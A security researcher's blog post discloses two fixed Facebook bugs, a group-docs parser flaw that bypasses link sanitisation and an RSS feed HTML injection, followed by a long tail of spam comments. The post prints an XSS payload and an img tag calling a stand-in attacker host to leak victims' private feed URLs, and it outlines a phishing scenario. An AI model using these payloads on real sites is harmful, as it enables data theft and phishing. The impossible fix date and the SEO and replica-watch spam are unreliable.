A while ago I realized that it's been a long time since I wrote about the web application security here, so when Facebook announced their security bug bounty program it seemed like a perfect opportunity to show off some web application security research. In this post I'll show the two bugs I found on Facebook (so far). Both bugs have been fixed on February 31st, 2012. Although these two bugs are not nearly as critical as the ones I usually write about on this blog (which just gives me further motivation to get back to Facebook bug hunting when I catch some time off my other projects, hopefully you'll read about some of those here as well), I think that they still might be interesting to other security researcher working on Facebook and web application security in general. So, without further ado:
Bug #1: Breaking the group docs parser
While examining the group docs parser I noticed an interesting way in which it handles images uploaded to group docs. Every image uploaded to a group doc gets represented in the form
(img:id)
where id is the id number of the uploaded image, for example
(img:107037326063026)
When the doc is displayed to the user, the above notation will get changed to the appropriate img html tag, for example
<img src="http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/251997_107037326063026_608256_a.jpg" ... />
So, if we edit a Facebook group doc and add the text '(img:id)', where id should be an actual image id, it will be changed to appropriate '<img src=.../>' tag when the doc is displayed.
In itself this is not a problem, but the bug reveals itself if we intercept a HTTP request when editing a group doc and put something like this in the doc body
<a href='http://www.somewebsite.com/#(img:107037326063026)'></a>
When such group doc gets displayed, the above will be changed to
<a href="http://www.somewebsite.com/#<img src="http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/251997_107037326063026_608256_a.jpg" fbid="107037326063026" hmac="ATqmQ6bijjIvXRta" />" onmousedown="UntrustedLink.bootstrap($(this), "4AQFWDRA8", event, bagof(null));" rel="nofollow" target="_blank"</a>
So again the (img:...) is replaced by <img src=.../> even though it is now contained in the 'href' property of a html anchor element
An example of this is shown in the image below
Note that the double quote opened at 'href="' is now closed by the quote in 'img src="' and that the 'a' tag is now closed by the '>' character actually belonging to the 'img' tag, thus breaking the page DOM.
So, why could this be considered a security issue? Firstly, note that normally, when you click any user-submitted link on Facebook, you don't get redirected to the link target immediately. Instead, the link is first sanitized through www.facebook.com/l.php script. This is accomplished by adding an onmousedown property to every anchor element. However, note that the above trick closes the anchor tag before the onmousedown property gets declared, thus the link sanitation is bypassed if anyone clicks this link.
Secondly, let's assume that Facebook development team makes one tiny, seemingly innocent, change in the future and allow the user to control any html property of the image added to the group doc. If something like this ever happened, this bug would become a stored XSS which, for a site like Facebook with its billion users might be considered a serious problem. Let's see how.
In this case, if the user could control some image property and add the image that would be rendered as
<img some_controllable_property=" onmouseover=alert(1) " src=...
and if the user adds the appropriate (img:id) in the href attribute of an anchor element, the html could end up displayed as
<a href="http://www.somewebsite.com/#<img some_controllable_property=" onmouseover=alert(1) " src="..."/>...
Which would execute JavaScript code controlled by the attacker (in this example, message box would be shown) if a user moves a mouse pointer over the link in the doc.
Note that, even though there is no possibility for using this as stored XSS in the current version of Facebook, I still think it's better to report this right away (It's obviously a bug) than to sit on it and wait for it to become more critical in the future.
Bug #2: Notification RSS feed HTML injection
Some background: every Facebook user has a notification RSS feed accessible through the http://www.facebook.com/notifications page. The RSS feed URL has the form
http://www.facebook.com/feeds/notifications.php?id=[id]&viewer=[viewer]&key=[key]format=rss20
To view the Facebook notifications of any user you just need to have his/her notification feed URL.
The bug is caused by the 'description' field in the RSS feed not being properly sanitized which enables arbitrary html code to be injected in the RSS feed. Although no JavaScript can be executed in the context of Facebook this way (at least it shouldn't in any decent RSS viewer) the bug could be used to disclose a notification feed URL to the attacker. The attacker can do this by injecting an img tag in the user's RSS feed. If the user views his RSS feed in the Internet Explorer (tested on IE8), when the injected image is requested, the URL of the RSS feed is sent in the http referrer header field, and can thus be sent straight to the attacker.
Let's consider the following attack scenario with two Facebook users, an attacker and a victim
1. Attacker creates a Facebook group and sets its title to "<img src="http://www.someevilwebsite.com/test.php">"
2. Attacker adds/invites a victim to the group
3. The group name (unsanitized!) automatically ends up in the notification feed of the victim
4. Victim uses Internet Explorer and clicks on her 'RSS' link in the http://www.facebook.com/notifications
5. The html code in the group title is rendered and the victim's browser makes a request to http://www.someevilwebsite.com/test.php
with the victim's RSS feed URL in the http header field.
6. Attacker listens to all http traffic to www.someevilwebsite.com and thus receives the victim's RSS feed URL from the http header.
7. When the attacker visits this URL he gets all of the victim's Facebook notifications.
A less technical, but perhaps more practical way to exploit this vulnerability would be to use it in social engineering/phishing attacks. For example, the attacker might inject html code in the victim's RSS feed that would make it appear like the user received some other (injected) notification which makes it appear that it's important for the victim to click on a link in that notification. When the victim clicks it he/she might end up on the attacker-controlled fake Facebook login page.
Note that group name was just one example of injecting code into victim's RSS feed, there were probably other attack scenarios for the same vulnerability.
56 comments:
Drago mi je da vidim nekoga sa ovih prostora sa znanjem , svaka cast , vas blog je excellent :)
Having your blog as an update reference keeps my job much easier. Thanks and keep it up! :)
eula_w
Hi
there have very nice information about fcebook this is nice post
online dating scam herpes london http://loveepicentre.com/taketour.php book on black women dating
As the facebook is at the pick of the world, it is needed. Thanks for your share.
have a look at Finding good a good security company
saving charlie ebook http://audiobookscollection.co.uk/fr/Dreamsongs-Volume-II/p17246/ quantum computing ebook [url=http://audiobookscollection.co.uk/it/Chaos-Theory/c1602/]side bender ebook[/url] photoshop graphic for websites ebook
Cоnsider running а cоntest or
οffеring a free pгoduct tip shееt thаt aсcomраnies thе іntегvіew.
Also, bу having a гadiо intеrnship
in youг resumе, there iѕ a betteг chance for you tо bеcome а DJ when
you аpplу fоr a job in any radіo statiοn
in the natіon. Thesе include the artist-branded musiс channelѕ such
as Thе Grateful Dead Channel, Eminеm's Shade 45, Jimmy Buffett's Raԁio Margarіtaville;
there іѕ eνen the сlaѕsicаl muѕiс
Metrοροlitаn Οpera Rаdio chаnnel.
Alsο viѕit my blοg рost ... www.naressi.com.br
Usually, a brand new website takes about six months to one year to appear
in the SERPs of Google, assuming the service provider is worth their salt.
Spend some time to design a good-looking 404 page, site offline page, etc.
Users normally tend to visit websites that are at the top of this list as they perceive
those to be more relevant to the query. Working with an SEO expert in your country can help as SEO
experts within the same country generally know how to optimize websites for a specific country's audience more effectively. Thus, in minimum cost, you get an opportunity to increase your site ranking on Search Engine Result Page (SERP). Enough said. They make their strategy according to the audience their client is targeting. Content writing for websites is not as simple as typing out a predetermined amount of words, if you wish people to view the content. The businesses have understood the need to take SEO services for attaining good search engine placement. Be sure that the SEO outsourcing company you hire is capable of communicating properly. Those who work on introduced SEO power suite, they choose best SEO tools among various tools available in the market. For instance, how many TV viewers then came to your car lot and purchased a vehicle. Their success is based on how many sales and customers you bring. No - you name some of your images "breast. Create a general, high-level category in which you want to manage all phrases'for example 'global,'
'online,' 'channel,' and so on. As of now, Thomas Lenarz has helped many people get the information on reputed SEO companies.
In fact, soon, not using RDFa could put a site at a disadvantage.
SEO content is a huge deal in today's online oriented business world. They are looking up the the keywords you did research on to find what they are looking for. November 2012.
Stop by my blog :: http://www.mglradio.com
Also see my page - what is a seo analyst
Each listing includes the skills taught and the suggested age for the activity.
A look into some of the best Star Wars apps to be found on i -
Tunes, including games, fun soundboards, books, and more.
Even when things seem hopeless, Kiko's narration provides some great comedy relief.
my weblog padderby.com
I have been browsing online more than 3 hours these days, but I never found any interesting article like yours.
It is beautiful value sufficient for me. In my view, if all webmasters and bloggers made just right
content as you did, the internet will be much more useful than ever before.
Feel free to surf to my page; Highly recommended Site
Therefore, the characters must sell animal skins in
order to get money for buying the weapons. Since the controversial introduction of the format in 2003 its growing
popularity now prompts the question of threat to
the traditional test format. In essence, they appreciated each other and
never lost sight of how lucky they felt to have each other
as their spouse. I don't want an strange voice to order me around. Their history timeline details how the greenhouse covered 4,000 square feet, and in 1976, a 6,000 square foot greenhouse was added. Originally established as a sanctuary for the Nilgiri Tahr, the 'The Eravikulam National Park' has now turned into a highly popular tourist spot. Of course, many people looking to boost their bone health choose to supplement their diets. Nevertheless, we're now moving on and talking about the top Xbox 360 games for 2012.
*Composite fillings. I died numerous times because of the stupid reload system.
My web blog - http://nalanda.org.br/
If you are using firewall software such as Outpost Firewall Pro,
the paid edition of Online Armor and Kaspersky Internet Security or
PURE, you can take advantage of using their Blocklist feature that will block connections to known malicious
URL and IP addresses. Spend some time to design a good-looking 404 page, site
offline page, etc. It's a competitive world out there on the world-wide web, but SEO consulting can help you dramatically improve your odds of being found in the din and getting your message across. Working with an SEO expert in your country can help as SEO experts within the same country generally know how to optimize websites for a specific country's audience more effectively.
A client can also seek troubleshooting services from SEO
experts if their site is blacklisted by Google or their
search engine rankings start to drop. Meta Name and Meta Description
Tags are two of the important ones. Since keyword analysis is needed for both SEO (search engine optimization)
and SEM, we often confuse using these terms. Lastly, make sure that you have a
reliable work-at-home office. Moreover, some companies are
not able to get the desired results and their techniques might even have bad effects on the business's website. ) of links. The final way that you can use your Deviant - ART profile for SEO purposes is by being an active member of the community ' watch the work of others (especially if they are related to your business), encourage others to watch your work,
comment on work, list other users as your friends. The concepts make
use of the current social networking sites, which are very popular among the online audience.
Moving your hosting to a nearby country such as Canada or an offshore Caribbean host may provide
the same latency times, but reduce the risk of having your website brought down by a mistake.
Such services also include some research that will need to
be done so they can apply this research on major keyword.
These professionals follow ethical SEO strategy and effectively
implement it that finally increases your website
visibility. Originally posted at: digitalmoz.
You need to try to find reputed SEO consultants. SEO content is a huge deal in today's online oriented business world. A good web solutions company will always provide you realistic time frame for the results to show up. This is more of an indirect way of getting direct traffic to your e - Bay store.
Here is my blog :: http://www.iiitmk.ac.in/
Аlthough you can't go back to any songs, you can skip songs, mark them as ones you like or dislike, and browse the names, bands, and CD the song is on of all the songs that have played already. Perhaps the best thing to do is keep an eye on the promotional deals and be ready to pounce quickly when a suitable one comes up. Proffering multifarious benefits to the advertisers, it is a quintessential resort for companies big or small.
Look into my blog; online radio
I know this if off topic but I'm looking into starting my own blog and was wondering what all is needed to get set up? I'm assuming having a blog
like yours would cost a pretty penny? I'm not very web savvy so I'm not 100% certain. Any recommendations or advice would be greatly appreciated. Many thanks
Feel free to surf to my blog post; kostenlos spiele spielen
Τhіs рost iѕ actually a nice onе it helpѕ nеw nеt people, who аre wishing fοг blogging.
Feel fгee to ѕuгf to my wеb site .
.. www.successus.dk
Also see my site :: Highly recommended Site
"Is there really no way to transfer my VC and Wii - Ware games from my Wii to another. Each program will have a box with a checkmark, find the programs you'd like to uninstall and uncheck that box. You'll have to keep the phone close (on the bed or in an armband) for the app to work.
my webpage - myvideo downloader
You've made some really good points there. I checked on the web for more info about the issue and found most people will go along with your views on this site.
My blog :: vervkorolyik.blog.com
Dadurch kann die Masse nicht aufgenommen werden, während
sie die Verdauung passiert, wodurch eine Gewichtsreduktion
erreicht wird. HIV and Single's mission, as stated on their website is to help people living with HIV find friendship, love and companionship without the fear of disclosure, stigmas or judgment. Jedoch das Schwierigkeit durch Diäten wie die Atkins Diät ist's, dass sie Sie setzen rein ernste Gefahr für Bluthochdruck und hohe Cholesterinwerte.
My web blog ... 10 kilo abnehmen
Also see my web page - www.thefylis.uoa.gr
[url=http://aaaquality24.co.uk/]fake watches[/url]
rolex oyster perpetual milgauss replica
rolex explorer ii
reputable replica watch dealers
tag heuer aquaracer prijs
burberry outlet reviews
http://aaaquality24.co.uk/
web application is knowledgeable topic and studied it from 6 months. free antivirus download
Its not my first timе to pаy a quісκ ѵiѕit this ωebsite, i am νiѕiting this web ρаge ԁаіlly and
оbtain goоd data from heге
every ԁay.
Alѕo νіѕit my wеb page: online Radio
As we all know, looks can be deceiving, so I decided to try out the
question tool for myself. The objective is to arrange your passions as carefully as possible with your online promotion
company. The race is becoming even more challenging with the passing of each day.
While you’re at it, remove all or fix 404 errors.
Organic SEO uses valid and safe techniques to rank your site for its keyword.
If the conversion is higher with a certain keyword
or a particular set of keywords, then the SEO vendor can focus on
the same keyword to get it ranked high in all the search engines.
Since keyword analysis is needed for both SEO
(search engine optimization) and SEM, we often confuse
using these terms. Having realized that it is
practically not possible to combat with SEO Next in terms of services
and offerings at this point of time, rivals have started thinking of an easier alternative of being successful in their mission.
The businesses have understood the need to take SEO services for attaining good search engine placement.
Most of the XML sitemap generators online are simple enough
for anyone to use. Arrange the H1, H2 and H3 tags serially with proper hierarchy.
Don't Forget to Replace the Default Favicon with Your Logo. Advertise by Selling Branded Products. It's more control than you get In many backlinks and every element of these controls allow you to link a bit more than he would
be out of control. This is where your innovative SEO marketing techniques can achieve a high search ranking for your budget
motel whenever a user is specifically searching for a
motel at your location. The sooner a site is presented in the search result, or the higher it “ranks”,
the more searchers will visit the site. Have you been
looking at your competitor's websites to see what kind of keywords they're using.
A person can find all sorts of products available at various prices on the
internet. First of all a market survey is done by them
as to know the competitors analysis. Addition and updation of fresh content always leads to arrival of increased traffic to your websites.
My homepage :: click the following internet page - wiki.raccoonfink.com
Hello There. I found your blog the usage of msn.
That is a very well written article. I will be sure to bookmark it and return to learn
extra of your helpful information. Thanks for the post.
I'll definitely return.
Check out my web-site absolution.su/wiki/index.php?title=Best-Ways-To-Market-Your-Online-Business
Hey theгe! Quick question that's totally off topic. Do you know how to make your site mobile friendly? My site looks weird when viewing from my iphone. I'm trying to find а template or plugіn that
might be able tо coгrect thіs issue. If you have any reсommendatiοnѕ,
plеase share. With thanks!
Μy webpage ... internet radio
Some people have hormonal disorders, glandular conditions,
genetic conditions or other concerns that are beyond their control that makes it harder
for them to lose weight. However, diabetics should never drink anything with this substance in it as it has a
very bad glycemic reaction on the body. Jedoch das Schwierigkeit
durch Diäten wie die Atkins Diät ist's, dass sie Sie setzen rein ernste Gefahr für Bluthochdruck und hohe Cholesterinwerte.
Also visit my web page; gut-reisen.info
I didn't want to drive all the way back to Autozone to pick up a new terminal post clamp, so I figured I'd attach it and see
what happened. The Lenmar 1530 m - Ah for the Amazon Kindle 1
e-reader is the first choice for consumers. Rechargeable batteries last longer
than single use batteries before disposal and reduce the number of batteries you buy.
My page; gratis spiele spielen
These five free basketball game apps for the i - Phone will surely help you get your game on.
If you want to enjoy the game thoroughly then you need to get on board of
a reliable online bingo site to get the maximum enjoyment as well as benefit of the game.
In fact an ideal online casino will make the entire gaming experience a pleasurable and a real experience to the gamer.
Also visit my webpage spiele spielen kostenlos
Tennis balls, wiffle balls, ping pong balls, and golf balls
can also be used. Real game, real people, real thrill and of course real money;
is all about online gaming, the perfect place to fulfill your desire to
be a multi millionaire. In our next article, we'll be tackling using SNES4i - Phone to do exactly that - play those old favorites, like Chono Trigger, Super Ghouls and Ghosts, or even Super Mario Bros 3.
Review my website :: kostenlos spielen ohne anmeldung
my site - myvideo downloader
Тhe faсt that Toуotа chose to upgгаde thе
exterior ѕtyling, interіor quality anԁ intеriοr roominess of the гedesigned 2012 Yariѕ hatchbaсk rаther thаn uρgradіng the ρowertrain says а lot about how Toyota viеws the nеeԁs of
small car buyers. Yet another way to construct a ԁеvice to
harness energy fгоm radio waves іs using аn antennа, сonnected to а ѕeries of diοdеs and a capacitor bаnk that іs eаrthed.
Τhe Public Radiο Tuner from Amеrican Publiс
Media may be one of the best radio applications you
can get.
Alsο visit my homeρage: gratis spiele spielen
Without the internet, this is not possible to play these novoline games online and even they can't live online that they perform now with public for additional characteristics and completely attractive in a delusion earth to participate in a game. One way to test yourself is to deal yourself hand after hand in front of a mirror and watch yourself as you react to the cards. The player guides Phen through 10 levels of dungeon gameplay, finding a whole host of weapons and other items as well.
My page ... youtube videos downloaden
This is a common misconception which will be resolved only with firsthand experience.
''. The race is becoming even more challenging with the
passing of each day. The only thing that cannot be
"fixed" later is your blog and post titles. It's so important because once customers begin seeking your product or service you will want to have favorable words making your search results optimized. Enough said. Since keyword analysis is needed for both SEO (search engine optimization) and SEM, we often confuse using these terms. This is because there is a stiff competition in this particular field and the market is flooded with lots of firms that provide proficient SEO experts India services at the economical costs. Isn't that something you and your business should be a part
of. People these days use the Internet for a varied purpose.
Arrange the H1, H2 and H3 tags serially with proper hierarchy.
The concepts make use of the current social networking sites, which are very popular among the online audience.
Advertise by Selling Branded Products. An SEO strategy should combine a number of elements that work together to get results
for you. Create a general, high-level category in which
you want to manage all phrases'for example 'global,' 'online,' 'channel,' and so on. It has been designed especially for business purposes and it holds biggest importance for your B2B online marketing strategy. Law firms face various challenges and have issues in remaining at the top in the market. However with passing time the complexity in this field has increased and performing an SEO task is not a simple thing to do. The website serves as a way for customers to find the business and be able to see what services are offered. ============ More at: Comment "Smartly" & Increase Page Views: Writing Essentials 8.
My web blog - click the following internet page
Wacom is probably the first stop for such a device, although Aiptek also make
some of the most popular tablets on the market. When children
fit these fun video game titles into actions require
time to view those facial seems to be and human body expressions.
I'm not against such games, but it never hurts to have alternatives in case one doesn't want their child playing those kinds of games
or maybe just would rather their kid be exposed to other types of gaming than the simple "shoot, run, shoot" types of games that are
so popular.
My page :: demarlinotin.webs.com
And then, you'll probably see that the battery's charge won't be as durable as before. However, it is still possible to insect the terminals and make sure there is no corrosion. Aside from these types of power packs, you can even choose the 8-cell and also 12-cell electric battery.
Check out my web-site ... internet radio
If you consider that an online bingo players, many sites that will stimulate
numerous of them to generate loose net casino break from
task and visits to offer in the track down for a down payment in the
past a definite date. A look into some of the best
Star Wars apps to be found on i - Tunes, including games, fun soundboards, books, and
more. However, make sure that your phone is equipped
with a powerful processor to enable deeper searches and
devise a strategy to give a challenging game of chess.
My web page :: internet radio
Hey there! Thiѕ iѕ my fіrst commеnt here sο I just wanted to
give a quick ѕhout out anԁ ѕay I tгuly enjoy readіng through your аrticlеs.
Can you rесоmmend any other blоgs/ωebѕites/foгums that go oѵer the
same topics? Thаnks for уouг
tіme!
Hеre іs my homepage :: megassuert
Also see my web page: meg
This is made possible by telecommunication experts who have worked and are still
working tirelessly to ensure that telephone technology
and its corresponding techniques become much more
user-friendly. A quick research showed that major reverse cell phone lookup services have a few pricing level.
In the last few years, you may have heard the words bullying or cyberstalking in the news quite a bit.
Also visit my web blog :: phone directory
It requires a lot of effort to break this habit of nail biting.
It does work, but I still treat myself to manicures to ensure that my hands
always look good. Skin picking and nail biting are chronic problems, so there is
not currently a "cure" but you can find relief if you are willing to work at it.
Feel free to surf to my blog How to stop nail biting
I feel that is one of the so much important info for me.
And i'm happy studying your article. However should observation on some general issues, The web site taste is wonderful, the articles is actually excellent : D. Just right activity, cheers
Feel free to surf to my web site :: phone directory
It's because the noises are only heard by the patient. A change of diet, stress-alleviation as well as exercises may be necessary since they are all aimed to improve your blood circulation. The Chinese have practiced what we would now call alternative medicine and treatment for centuries.
Here is my homepage :: cure for tinnitus
I treasure the data on your site. Cheers. i SUCK i KNOW
C: Explain how breach of trust is one of the biggest reputation damagers there is and how it
my web site ... google reputation management
Whether you have skin disorders or want to avoid them, supplementation is recommended
Also visit my web site: omega3
Ask around for recommendations for a good seamstress & look for someone
who has experience making wedding dresses
Here is my web site ... website
These materials are light and will do well in the beach wind
Also visit my web blog visit us
All that cares for the couples are the perfect wedding dresses
Here is my page http://greenbayweddingdresses.com/
If adult comedy is what entertains you then there are plenty of
these as well. When it is in the Viewer you can go to the Filters tab and make corrections to change it
between horizontal and vertical if you want.
This application is difficult and requires and incredible amount of
power from your Mac, but some experience will help you out quite a bit.
Here is my webpage :: lnx.gamps.it
These online dress-up video games have about hundreds of online games stored in its database.
Your best bet is to choose a video card that is just one or two steps
down from the number one card now. The fragmentation from the system registry results in bad functionality in not simply gaming;
but also in common operations of the computer.
my blog post - wallinside.com
Utilizing pop-up windows is an easy and inexpensive
way of advertising
Look at my website ... click now
I can't tell you how fast you will see results because it depends on how much you want to get rid of acne. Touching your chin frequently will transfer these germs and dirt to the chin area which may result in acne on chin. There are a wide range of self tanners to choose from at department stores, but why not treat yourself to a spray tan at your nearest tanning salon.
Have a look at my page How To Get Rid Of Warts Around The Eye
this is extra ordinary blog. free antivirus download
The most attractive feature of an online radio tuner is its ability to record what you're listening to. Perhaps there is a news broadcast you want to check, or perhaps a vital sports game you cannot miss. This is a fantastic app for people who travel and it now supports multitasking.
My blog post :: 1
I have spoke with traders who merely want to "do a deal" with a particular
guru. Robert Shumake's mission is to inform the public about mortgage fraud and real estate scams and to provide tips on how to avoid being a victim. There is very little scope for appreciation in under-construction residential projects.
My blog: Vuokrataan Asunto
Do keep in mind that if you do get a free hotel
room, there will still be a small cost to you in terms of the taxes excised
on that hotel room stay
My homepage :: click the following web page
That is a really good tip especially to those fresh to
the blogosphere. Brief but very precise info… Appreciate your sharing this one.
A must read post!
Here is my blog post ... book of ra online spielen ohne anmeldung kostenlos
teen dating stories http://loveepicentre.com/map/ top dating service
zombie dating [url=http://loveepicentre.com/map/]free christian phoenix dating site[/url] dating game parody
black gay males for dating [url=http://loveepicentre.com/testimonials/]dating relationship quizzes[/url] who is dating travis stork [url=http://loveepicentre.com/user/leech/]leech[/url] young professionals dating
Hello there! Do you know if they make any plugins to safeguard against hackers?
I'm kinda paranoid about losing everything I've worked
hard on. Any suggestions?
my weblog :: gamersadda.org
Post a Comment